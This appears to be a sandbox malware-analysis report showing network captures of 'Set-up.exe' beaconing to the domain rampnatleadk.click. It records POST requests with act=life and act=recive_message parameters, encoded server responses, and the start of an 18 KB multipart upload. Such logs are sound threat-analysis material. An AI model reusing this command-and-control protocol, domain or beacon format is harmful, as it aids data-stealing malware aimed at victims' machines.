                                                                                    Jan 12, 2025 15:20:21.261594057 CET49737443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:21.261606932 CET44349737172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:21.757654905 CET44349737172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:21.757785082 CET49737443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:21.758768082 CET49737443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:21.758785009 CET44349737172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:21.759728909 CET44349737172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:21.761069059 CET49737443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:21.761145115 CET49737443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:21.761149883 CET44349737172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:22.233613968 CET44349737172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:22.233850956 CET44349737172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:22.234071016 CET49737443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:22.234559059 CET49737443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:22.234571934 CET44349737172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:22.851324081 CET49741443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:22.851367950 CET44349741172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:22.851866961 CET49741443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:22.851867914 CET49741443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:22.851907969 CET44349741172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:23.442008018 CET44349741172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:23.442162037 CET49741443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:23.443069935 CET49741443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:23.443084002 CET44349741172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:23.443434954 CET44349741172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:23.455646038 CET49741443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:23.456299067 CET49741443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:23.456345081 CET44349741172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:23.456624985 CET49741443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:23.456669092 CET44349741172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:23.456796885 CET49741443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:23.456897974 CET44349741172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:23.457047939 CET49741443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:23.457088947 CET44349741172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:23.457264900 CET49741443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:23.457313061 CET44349741172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:23.457500935 CET49741443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:23.457550049 CET44349741172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:23.457576036 CET49741443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:23.457755089 CET49741443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:23.457815886 CET49741443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:23.465557098 CET44349741172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:23.465815067 CET49741443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:23.465858936 CET44349741172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:23.465904951 CET49741443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:23.466001987 CET49741443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:23.466057062 CET49741443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:23.467006922 CET44349741172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:23.467138052 CET49741443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:23.467179060 CET44349741172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:26.137933969 CET44349741172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:26.138001919 CET44349741172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:26.138113976 CET49741443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:26.138202906 CET49741443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:26.138241053 CET44349741172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:26.164457083 CET49745443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:26.164542913 CET44349745172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:26.164628029 CET49745443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:26.165004015 CET49745443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:26.165039062 CET44349745172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:26.618268967 CET44349745172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:26.618370056 CET49745443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:26.619371891 CET49745443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:26.619401932 CET44349745172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:26.619631052 CET44349745172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:26.626986980 CET49745443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:26.627029896 CET49745443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:26.627074003 CET44349745172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:27.973925114 CET44349745172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:27.973984003 CET44349745172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:27.974066973 CET49745443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:27.974219084 CET49745443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:27.974219084 CET49745443192.168.2.4172.67.139.144
                                                                                    Jan 12, 2025 15:20:27.974261999 CET44349745172.67.139.144192.168.2.4
                                                                                    Jan 12, 2025 15:20:27.974289894 CET44349745172.67.139.144192.168.2.4

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jan 12, 2025 15:20:12.619774103 CET5330853192.168.2.41.1.1.1
                                                                                    Jan 12, 2025 15:20:12.641587973 CET53533081.1.1.1192.168.2.4

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Jan 12, 2025 15:20:12.619774103 CET192.168.2.41.1.1.10x3b42Standard query (0)rampnatleadk.clickA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Jan 12, 2025 15:20:12.641587973 CET1.1.1.1192.168.2.40x3b42No error (0)rampnatleadk.click172.67.139.144A (IP address)IN (0x0001)false
                                                                                    Jan 12, 2025 15:20:12.641587973 CET1.1.1.1192.168.2.40x3b42No error (0)rampnatleadk.click104.21.79.9A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • rampnatleadk.click

                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.449732172.67.139.1444437104C:\Users\user\Desktop\Set-up.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-12 14:20:13 UTC265OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: rampnatleadk.click
                                                                                    2025-01-12 14:20:13 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2025-01-12 14:20:14 UTC1134INHTTP/1.1 200 OK
                                                                                    Date: Sun, 12 Jan 2025 14:20:14 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=kfb340jam09oabo0l41ttj19nl; expires=Thu, 08 May 2025 08:06:52 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    X-Frame-Options: DENY
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nNzkfXyilkcEScPZwsSJhVwp51G9pHnoBRrFS%2BkiSuc8xyIBKNK%2FxXbKPn%2FZ8dBLfbSyB2bIkAceqMSL81xNrdBEXsHEryvsQRYMQ7%2FO2ivsUUYVu8iKv%2BHBH%2ByAJXtGWhIHKXI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 900dc937ffec43ed-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1649&min_rtt=1638&rtt_var=636&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=909&delivery_rate=1690793&cwnd=210&unsent_bytes=0&cid=a4b596ef4a504d50&ts=1037&x=0"
                                                                                    2025-01-12 14:20:14 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                    Data Ascii: 2ok
                                                                                    2025-01-12 14:20:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.449733172.67.139.1444437104C:\Users\user\Desktop\Set-up.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-12 14:20:14 UTC266OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 49
                                                                                    Host: rampnatleadk.click
                                                                                    2025-01-12 14:20:14 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 66 42 6b 43 6d 75 2d 2d 6e 65 78 74 32 6b 24 26 6a 3d
                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=fBkCmu--next2k$&j=
                                                                                    2025-01-12 14:20:15 UTC1131INHTTP/1.1 200 OK
                                                                                    Date: Sun, 12 Jan 2025 14:20:15 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=r60d42ma807p9adsjlmjl1ur1h; expires=Thu, 08 May 2025 08:06:53 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    X-Frame-Options: DENY
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VPu6zSGqRuzkjqgG%2FyM7etndCd0SdMbhSZde%2BNNgYR051qzVs%2FPQq6mWfTGj%2BlOz3DlCWx5WYTxFVpF9XFvXPv%2Fuq0aWFi8iZCV7EaugyzJbDhwy29wKbTffyDUyt2bvX79VObA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 900dc93fe95fc340-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2085&min_rtt=1640&rtt_var=933&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=951&delivery_rate=1780487&cwnd=146&unsent_bytes=0&cid=edf0596acbc7c795&ts=505&x=0"
                                                                                    2025-01-12 14:20:15 UTC238INData Raw: 34 36 63 0d 0a 33 4a 35 37 6f 7a 6b 4d 6f 59 65 64 54 67 70 58 34 4a 46 70 79 54 5a 4b 47 33 4a 6f 4b 77 58 70 2f 78 79 62 73 31 43 54 74 55 4f 6e 76 41 32 42 41 7a 69 4e 70 65 34 72 4b 47 32 55 34 78 79 73 47 6d 68 36 46 6b 6f 52 59 34 69 54 62 2f 36 66 63 75 58 59 59 65 62 34 47 73 39 4b 61 59 32 6c 2b 44 59 6f 62 62 76 71 53 36 78 59 61 43 46 51 44 55 46 6e 69 4a 4e 2b 2b 74 67 2f 34 39 6b 67 74 50 49 63 79 31 78 76 78 65 62 78 49 32 38 79 68 66 41 44 70 31 38 6e 63 78 39 4b 42 79 65 4d 68 54 36 68 6b 52 33 32 77 53 4b 52 2f 77 6a 49 47 33 47 4e 2f 4c 38 72 5a 48 58 61 73 77 69 73 56 43 5a 39 46 67 4e 44 62 59 47 62 66 2f 2f 5a 49 50 72 54 4b 37 54 38 48 38 70 57 5a 74 48 72 2b 79 52 6b 4e 49 2f 77 53
                                                                                    Data Ascii: 46c3J57ozkMoYedTgpX4JFpyTZKG3JoKwXp/xybs1CTtUOnvA2BAziNpe4rKG2U4xysGmh6FkoRY4iTb/6fcuXYYeb4Gs9KaY2l+DYobbvqS6xYaCFQDUFniJN++tg/49kgtPIcy1xvxebxI28yhfADp18ncx9KByeMhT6hkR32wSKR/wjIG3GN/L8rZHXaswisVCZ9FgNDbYGbf//ZIPrTK7T8H8pWZtHr+yRkNI/wS
                                                                                    2025-01-12 14:20:15 UTC901INData Raw: 2b 55 55 4c 32 46 51 55 67 6b 30 75 5a 35 76 36 4d 51 2f 34 64 46 68 6f 62 49 41 67 56 78 69 67 37 32 2f 4a 47 51 37 68 2f 41 45 72 46 55 6f 61 78 38 4b 53 6d 2b 44 6d 58 54 32 33 6a 33 2f 33 53 61 32 39 52 37 4f 58 47 62 46 36 76 78 73 4a 6e 57 46 36 30 76 7a 46 41 68 70 45 77 6c 64 61 70 72 64 59 62 66 49 63 76 62 62 59 65 61 38 48 38 39 61 59 38 50 33 39 79 64 6a 4d 4a 44 34 41 71 5a 5a 4b 48 51 61 42 55 70 6e 6a 4a 64 30 39 74 73 32 2f 4e 6f 6e 76 76 78 5a 6a 78 74 70 32 36 57 6e 62 45 73 77 6b 76 51 48 76 52 59 53 4f 51 39 45 55 43 65 4d 6b 54 36 68 6b 54 72 30 31 43 4b 31 38 78 72 4a 55 48 7a 44 39 2f 6b 68 62 53 65 45 39 67 57 68 56 7a 70 7a 48 67 78 4b 62 6f 43 55 65 2f 37 56 63 72 2b 58 4a 71 61 38 51 59 46 36 59 38 6a 70 39 54 74 6f 64 5a 32 39
                                                                                    Data Ascii: +UUL2FQUgk0uZ5v6MQ/4dFhobIAgVxig72/JGQ7h/AErFUoax8KSm+DmXT23j3/3Sa29R7OXGbF6vxsJnWF60vzFAhpEwldaprdYbfIcvbbYea8H89aY8P39ydjMJD4AqZZKHQaBUpnjJd09ts2/NonvvxZjxtp26WnbEswkvQHvRYSOQ9EUCeMkT6hkTr01CK18xrJUHzD9/khbSeE9gWhVzpzHgxKboCUe/7Vcr+XJqa8QYF6Y8jp9TtodZ29
                                                                                    2025-01-12 14:20:15 UTC1369INData Raw: 34 35 32 38 0d 0a 4a 6e 34 47 53 6c 59 70 6b 74 31 35 39 5a 46 71 73 64 67 75 73 66 51 5a 77 46 39 6a 78 2b 54 79 49 47 45 32 6a 76 38 44 70 6c 67 73 64 68 67 43 53 6d 2b 5a 6b 33 44 2f 31 7a 4c 30 6c 32 2f 2b 2b 77 47 42 41 79 37 6e 36 2b 67 34 59 33 65 33 38 41 57 6c 55 7a 34 35 44 30 52 51 4a 34 79 52 50 71 47 52 50 50 7a 63 4c 62 6e 31 47 4d 4a 62 5a 4d 33 71 39 53 52 67 4e 59 2f 79 41 4b 4e 53 4a 58 49 66 42 55 35 76 69 4a 46 37 39 4e 4a 79 76 35 63 6d 70 72 78 42 67 58 35 67 77 50 54 75 62 6c 30 32 6a 50 30 4d 76 52 51 33 4e 77 6c 4b 54 6d 76 4c 78 54 37 7a 31 6a 58 31 32 69 75 39 2b 42 33 4d 56 47 66 4b 37 4f 30 6d 5a 44 75 51 2f 67 47 75 57 69 52 38 48 77 70 49 5a 6f 57 58 64 62 6d 66 63 76 62 50 59 65 61 38 4e 73 78 4c 66 4d 6e 75 37 6d 35 64 4e
                                                                                    Data Ascii: 4528Jn4GSlYpkt159ZFqsdgusfQZwF9jx+TyIGE2jv8DplgsdhgCSm+Zk3D/1zL0l2/++wGBAy7n6+g4Y3e38AWlUz45D0RQJ4yRPqGRPPzcLbn1GMJbZM3q9SRgNY/yAKNSJXIfBU5viJF79NJyv5cmprxBgX5gwPTubl02jP0MvRQ3NwlKTmvLxT7z1jX12iu9+B3MVGfK7O0mZDuQ/gGuWiR8HwpIZoWXdbmfcvbPYea8NsxLfMnu7m5dN
                                                                                    2025-01-12 14:20:15 UTC1369INData Raw: 7a 46 41 64 36 42 67 41 4a 65 4d 57 45 50 76 37 64 63 71 6d 58 4b 37 4c 34 47 73 31 53 59 73 37 6b 2b 79 74 6c 4d 59 4c 31 44 61 35 56 49 33 45 63 42 55 4e 72 6a 35 46 33 2f 39 30 78 38 74 46 68 38 4c 77 65 32 52 73 32 67 38 54 79 4a 32 51 31 67 65 49 4d 36 78 70 6f 64 78 59 4b 43 54 2b 64 6a 57 6e 2b 7a 6e 7a 6f 6c 79 61 79 76 45 47 42 55 58 7a 47 36 2f 73 6d 62 54 47 4f 2b 51 75 75 52 69 42 2f 46 77 5a 42 59 6f 53 62 65 2f 54 57 4f 66 4c 46 4d 37 33 34 46 38 30 62 49 49 50 69 35 32 77 77 64 61 66 6b 43 4c 74 53 4b 7a 6b 50 52 46 41 6e 6a 4a 45 2b 6f 5a 45 79 2f 39 73 71 75 66 63 53 78 56 39 75 7a 75 37 78 49 6d 45 35 69 76 38 4d 75 56 6b 74 63 52 6f 44 54 47 75 47 6e 6d 7a 36 30 48 4b 2f 6c 79 61 6d 76 45 47 42 66 46 33 30 78 72 38 7a 4a 69 7a 43 39 41
                                                                                    Data Ascii: zFAd6BgAJeMWEPv7dcqmXK7L4Gs1SYs7k+ytlMYL1Da5VI3EcBUNrj5F3/90x8tFh8Lwe2Rs2g8TyJ2Q1geIM6xpodxYKCT+djWn+znzolyayvEGBUXzG6/smbTGO+QuuRiB/FwZBYoSbe/TWOfLFM734F80bIIPi52wwdafkCLtSKzkPRFAnjJE+oZEy/9squfcSxV9uzu7xImE5iv8MuVktcRoDTGuGnmz60HK/lyamvEGBfF30xr8zJizC9A
                                                                                    2025-01-12 14:20:15 UTC1369INData Raw: 56 52 4d 46 51 69 65 55 30 32 65 35 31 6a 36 78 6a 32 47 35 39 42 48 50 57 47 6a 49 36 66 4d 74 59 54 4f 48 2b 77 79 6b 55 79 46 2b 45 41 78 62 59 49 61 55 66 76 4c 59 4f 50 58 57 4b 76 36 79 57 63 5a 44 4c 70 75 6c 7a 53 74 2b 4a 59 47 7a 46 4f 56 4e 61 48 34 63 53 68 45 6e 68 6f 39 2f 2f 4d 4d 32 2f 74 77 7a 74 66 6f 5a 78 45 6c 70 7a 2b 2f 77 4c 32 41 34 67 66 73 5a 71 31 6b 6f 61 77 49 4d 51 6d 6e 4c 30 7a 37 2b 79 58 4b 70 6c 78 43 70 39 31 6e 65 46 58 65 44 34 76 4e 73 4d 48 57 42 2b 51 61 6c 52 69 78 2f 47 77 6c 48 62 34 36 56 65 76 50 63 50 66 72 64 4b 4c 62 38 46 73 52 54 5a 63 58 72 2f 69 70 6b 4f 4d 4b 39 53 36 78 4d 61 43 46 51 4c 56 4e 71 6a 59 70 76 7a 4e 59 79 6f 4a 63 2b 38 4f 56 5a 78 6c 63 75 6d 36 58 79 49 47 49 34 68 2f 63 44 72 46 63
                                                                                    Data Ascii: VRMFQieU02e51j6xj2G59BHPWGjI6fMtYTOH+wykUyF+EAxbYIaUfvLYOPXWKv6yWcZDLpulzSt+JYGzFOVNaH4cShEnho9//MM2/twztfoZxElpz+/wL2A4gfsZq1koawIMQmnL0z7+yXKplxCp91neFXeD4vNsMHWB+QalRix/GwlHb46VevPcPfrdKLb8FsRTZcXr/ipkOMK9S6xMaCFQLVNqjYpvzNYyoJc+8OVZxlcum6XyIGI4h/cDrFc
                                                                                    2025-01-12 14:20:15 UTC1369INData Raw: 6b 35 72 79 38 55 2b 39 39 77 30 38 4e 59 70 74 76 77 66 79 31 39 74 79 75 62 34 4a 57 34 2b 67 66 6b 45 72 46 49 73 65 52 73 4e 52 32 47 4f 6c 6e 65 35 6e 33 4c 32 7a 32 48 6d 76 44 2f 69 53 58 7a 78 36 2f 77 33 4b 43 72 4d 36 6b 75 73 57 47 67 68 55 41 46 42 61 4a 6d 59 64 2f 48 56 4f 2f 48 54 4b 37 50 37 47 63 52 57 61 38 66 72 2b 79 74 6f 4f 59 33 30 41 36 52 51 4b 48 5a 51 52 41 6c 67 6b 39 30 6d 75 66 45 35 35 2f 59 76 74 65 35 5a 33 68 56 33 67 2b 4c 7a 62 44 42 31 6a 50 6f 4b 6f 31 6f 6b 63 52 51 59 53 57 79 43 6b 6e 2f 32 30 54 48 77 33 53 6d 73 2b 68 6e 4b 55 32 6e 4c 34 66 45 2b 61 54 72 43 76 55 75 73 54 47 67 68 55 44 74 66 59 49 79 53 50 4e 44 57 4b 66 44 64 49 72 58 77 57 64 34 56 64 34 50 69 38 32 77 77 64 59 2f 2f 42 71 39 47 4a 48 6b 51
                                                                                    Data Ascii: k5ry8U+99w08NYptvwfy19tyub4JW4+gfkErFIseRsNR2GOlne5n3L2z2HmvD/iSXzx6/w3KCrM6kusWGghUAFBaJmYd/HVO/HTK7P7GcRWa8fr+ytoOY30A6RQKHZQRAlgk90mufE55/Yvte5Z3hV3g+LzbDB1jPoKo1okcRQYSWyCkn/20THw3Sms+hnKU2nL4fE+aTrCvUusTGghUDtfYIySPNDWKfDdIrXwWd4Vd4Pi82wwdY//Bq9GJHkQ
                                                                                    2025-01-12 14:20:15 UTC1369INData Raw: 75 57 63 50 7a 51 50 76 76 51 4c 36 7a 39 45 38 31 61 61 63 54 75 37 53 64 36 50 6f 72 77 42 61 4e 64 4b 48 63 51 43 30 52 6e 79 39 4d 2b 2f 73 6c 79 71 5a 63 45 6e 65 73 50 79 78 6c 4e 31 50 50 31 4b 32 51 6a 69 66 49 49 76 56 6b 34 4f 56 35 4b 57 47 43 61 33 53 62 76 77 53 58 32 79 47 2b 6e 76 42 37 4e 47 7a 61 44 37 76 41 69 5a 54 36 47 2b 67 36 6a 56 79 31 38 47 67 5a 46 5a 6f 4f 55 64 50 7a 55 4e 50 76 55 4c 37 48 39 46 63 56 53 59 4d 71 6c 73 57 78 76 4c 63 4b 72 53 35 31 45 4c 32 45 64 47 67 74 56 69 49 78 76 37 4e 77 69 39 35 55 4f 76 66 41 61 78 46 78 2b 67 2f 71 78 4e 53 67 79 6a 72 4e 54 36 31 51 73 64 52 4d 4e 52 32 69 47 6b 6e 6e 79 33 6a 6a 2f 78 53 36 37 39 42 58 4a 56 6e 7a 4a 37 2b 30 6c 59 54 69 4d 2b 78 6d 6f 46 47 59 35 46 78 49 4a 50
                                                                                    Data Ascii: uWcPzQPvvQL6z9E81aacTu7Sd6PorwBaNdKHcQC0Rny9M+/slyqZcEnesPyxlN1PP1K2QjifIIvVk4OV5KWGCa3SbvwSX2yG+nvB7NGzaD7vAiZT6G+g6jVy18GgZFZoOUdPzUNPvUL7H9FcVSYMqlsWxvLcKrS51EL2EdGgtViIxv7Nwi95UOvfAaxFx+g/qxNSgyjrNT61QsdRMNR2iGknny3jj/xS679BXJVnzJ7+0lYTiM+xmoFGY5FxIJP
                                                                                    2025-01-12 14:20:15 UTC1369INData Raw: 78 6b 51 32 2f 6c 7a 6e 2b 70 46 6e 30 57 47 44 4e 34 75 6b 39 4a 52 53 50 2b 41 65 6d 57 79 4d 35 58 6b 70 50 4a 39 50 4e 4d 4c 6e 56 49 37 47 50 63 65 79 6e 54 4a 49 4d 50 70 48 36 73 54 55 6f 49 38 4b 72 57 65 55 55 4f 6a 6c 49 53 67 35 6b 6d 59 39 34 2b 73 63 78 74 75 6b 66 6e 65 73 50 79 30 41 73 35 65 4c 75 4a 58 34 34 6b 4d 30 31 68 56 6b 70 65 68 35 49 65 48 47 47 6a 58 33 38 31 67 7a 50 32 53 61 71 2b 78 66 48 57 79 36 4e 70 66 42 73 4d 41 7a 43 75 30 75 55 47 6d 68 68 55 46 49 4a 55 6f 69 54 63 50 37 48 49 37 7a 30 4e 71 6a 32 41 6f 4e 39 61 64 4c 73 36 53 46 36 64 63 79 7a 44 65 73 4d 65 44 64 51 44 6c 67 6e 30 38 30 73 6f 6f 52 68 70 6f 64 7a 6f 62 49 41 67 55 30 75 6d 37 65 78 62 48 70 31 32 72 4e 4d 71 45 59 36 66 78 4d 63 53 69 43 31 6f 31
                                                                                    Data Ascii: xkQ2/lzn+pFn0WGDN4uk9JRSP+AemWyM5XkpPJ9PNMLnVI7GPceynTJIMPpH6sTUoI8KrWeUUOjlISg5kmY94+scxtukfnesPy0As5eLuJX44kM01hVkpeh5IeHGGjX381gzP2Saq+xfHWy6NpfBsMAzCu0uUGmhhUFIJUoiTcP7HI7z0Nqj2AoN9adLs6SF6dcyzDesMeDdQDlgn080sooRhpodzobIAgU0um7exbHp12rNMqEY6fxMcSiC1o1
                                                                                    2025-01-12 14:20:15 UTC1369INData Raw: 71 59 64 7a 35 61 6c 4b 6c 67 73 38 33 4b 76 6d 62 48 35 31 32 71 46 46 36 30 5a 6f 49 56 42 4e 53 6e 57 5a 6d 33 33 76 30 6e 58 50 36 52 53 39 38 68 66 47 54 56 76 41 39 50 77 73 59 77 75 38 30 67 57 67 55 79 52 76 4c 6a 52 38 5a 49 57 54 65 65 2f 41 63 72 2b 58 4c 76 36 6b 49 49 45 54 4c 76 79 72 76 7a 51 6f 62 63 4c 47 43 4b 56 61 4c 32 38 42 52 33 78 6b 6d 70 35 2b 38 70 46 38 73 64 46 68 35 71 35 58 67 56 39 2f 67 37 32 76 66 6a 4e 67 30 61 52 62 2b 55 74 6d 59 46 41 63 43 54 2f 5a 30 7a 37 72 6b 57 71 78 6b 43 4b 73 37 68 2f 43 54 57 32 45 32 38 45 4b 61 7a 4b 45 38 41 57 38 52 57 70 57 45 77 46 46 61 34 79 4c 51 4d 66 45 4d 66 2f 5a 4a 71 6a 74 57 59 38 62 59 59 4f 39 78 6d 78 35 50 34 57 2f 51 2b 64 46 4f 33 63 62 48 45 34 6e 74 4e 4d 2b 34 5a 46
                                                                                    Data Ascii: qYdz5alKlgs83KvmbH512qFF60ZoIVBNSnWZm33v0nXP6RS98hfGTVvA9PwsYwu80gWgUyRvLjR8ZIWTee/Acr+XLv6kIIETLvyrvzQobcLGCKVaL28BR3xkmp5+8pF8sdFh5q5XgV9/g72vfjNg0aRb+UtmYFAcCT/Z0z7rkWqxkCKs7h/CTW2E28EKazKE8AW8RWpWEwFFa4yLQMfEMf/ZJqjtWY8bYYO9xmx5P4W/Q+dFO3cbHE4ntNM+4ZF


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.449734172.67.139.1444437104C:\Users\user\Desktop\Set-up.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-12 14:20:15 UTC279OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=3XEH7KGCEF7JX
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 18135
                                                                                    Host: rampnatleadk.click
